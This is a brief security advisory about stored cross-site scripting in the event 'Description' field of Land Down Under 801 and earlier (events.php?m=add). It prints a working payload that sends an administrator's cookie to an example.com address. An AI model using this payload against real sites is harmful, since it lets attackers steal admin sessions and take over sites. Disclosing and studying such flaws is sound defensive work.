Land Down Under 801 and earlier suffer from XSS in events.php
83fa6b7a9c60dd842f68c8597be41e2990cab238baf08118e586c34244e3edaf
In Land Down Under (LDU http://www.neocrome.net/), the target script "events.php?m=add" is vulnerable to XSS.
When submitting an event, the "Description" field is vulnerable to HTML injection. Any user logged in can submit an event but an admin must approve of the event before being publicly viewed. Using javascript, an admin's cookie can be stolen.
Exploit:
Description:
<script>document.location="http://example.com/script?cookie="+escape(document.cookie)</script>
LDU 801 and earlier are vulnerable.
--------------------------------
conor.e.buckley@gmail.com
http://quixote.at.preempted.net